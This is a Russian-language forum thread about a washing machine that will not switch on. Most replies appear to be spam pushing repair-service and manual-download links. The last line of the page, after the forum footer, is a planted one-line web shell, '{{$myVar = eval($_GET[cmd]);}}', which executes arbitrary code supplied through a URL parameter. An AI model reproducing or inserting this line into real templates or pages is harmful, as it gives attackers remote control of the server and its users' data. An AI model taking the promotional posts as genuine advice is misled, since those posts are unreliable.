+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Стиральная машинка


  1. #1
    Мимо проходил ALEX R is on a distinguished road Аватар для ALEX R
    Регистрация
    13.04.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20

    Стиральная машинка

    Всем доброго времени суток. Подскажите, куда можно обратиться по поводу поломки стиральной машины в Питере? Утром жена хотела постирать белье, но машинка просто не включается. Никто с таким не сталкивался?

  2. #2
    Мимо проходил DamianBeata is on a distinguished road Аватар для DamianBeata
    Регистрация
    19.12.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19
    А у вас стиральная машинка, какой фирмі? У нас Индезит, и она в последнее время часто не включается. Знаю, что в Беко и Канди,, в которых много функций, то они со временем сбиваются. Для начала ее просто можно перезапустить.

  3. #3
    Мимо проходил Doro Wietrzyk is on a distinguished road Аватар для Doro Wietrzyk
    Регистрация
    25.12.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    14
    Как вариант если в машинке есть встроенный тестовый режим, то вы можете провести диагностику. Если это не поможет, то все равно вы сможете установить причину возникшего сбоя.

  4. #4
    Мимо проходил Larisa Cherevuk is on a distinguished road Аватар для Larisa Cherevuk
    Регистрация
    25.12.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    17
    Из своего опыта могу вам сказать, что причин сбоя работы машинки может быть много. И самому решить проблему поломки самому не получится. В этом случае лучше обратиться в сервис, и заказать услугу ремонта стиральных машин на дому https://washrotate.ru/ Мастер проведет диагностику и установит причину поломки.

  5. #5
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Меня, честно говоря, немного разнервировало, когда мы купили стирально-сушильную машину и честно говоря, не обратили внимания, что инструкция полностью там на разных языках, а русского нет. Непонятно, почему такая ситуация и уже мы с такой ситуацией сталкивались, не в первый раз. Конечно, я уже знаю, где можно найти инструкцию, у нас такая же ситуация была и с телефоном, который я покупала. В общем мне тогда, тоже пришлось искать инструкцию на русском языке. Инструкцию на сушильно-стиральную машину LG fh2a8hdm2n и телефон я взяла на портале «EMANUALS», на который уже обращалась не один раз, рада, что он вообще есть, а так бы пришлось наверно учить китайский язык или английский досконально.

  6. #6
    Мимо проходил Anton Dadon is on a distinguished road Аватар для Anton Dadon
    Регистрация
    21.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    90
    Мне нужен проверенный сервис в Екатеринбурге?

  7. #7
    Мимо проходил Tarapitis is on a distinguished road Аватар для Tarapitis
    Регистрация
    07.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    42
    Стиральная машина в любой момент может выйти из строя. Поэтому, для оперативного выхода из такой ситуации, у вас должны быть контакты проверенного центра по ремонту. К примеру, есть специалисты в Екатеринбурге 102 мастера https://expert.ru/2019/12/14/osobenn...alnyih-mashin/ Судя по отзывам, выполняют быстрые, и в тоже время качественные ремонты с гарантией результата. После ремонтного вмешательства, вам дадут рекомендации по правильной эксплуатации в дальнейшем. Это позволит как можно дольше эксплуатировать стиральную машину без серьезных поломок.

  8. #8
    Мимо проходил Анна_Куськова is on a distinguished road Аватар для Анна_Куськова
    Регистрация
    31.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    21
    https://profi.ru/remont/byttehnika/r...ralnyh-mashin/ в Москве обращаюсь только сюда. Качественно ремонтируют.

+ Ответить в теме

Похожие темы

  1. Радиоуправляемая машинка с ДВС
    от Azazavr в разделе Покупка и продажа
    Ответов: 2
    Последнее сообщение: 02.01.2024, 04:47
  2. Стиральная машина
    от Kurdt в разделе Семья и дом
    Ответов: 3
    Последнее сообщение: 02.10.2023, 20:27
  3. Сломалась стиральная машина
    от Victan в разделе Разное
    Ответов: 5
    Последнее сообщение: 04.08.2019, 15:36
  4. подскажите чья машинка?
    от Fels в разделе Курилка
    Ответов: 2
    Последнее сообщение: 09.07.2011, 17:52
  5. Знакома ли Вам машинка? Хочу её купить
    от iSANDER в разделе Отзывы / Выбор
    Ответов: 9
    Последнее сообщение: 28.11.2007, 22:10

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}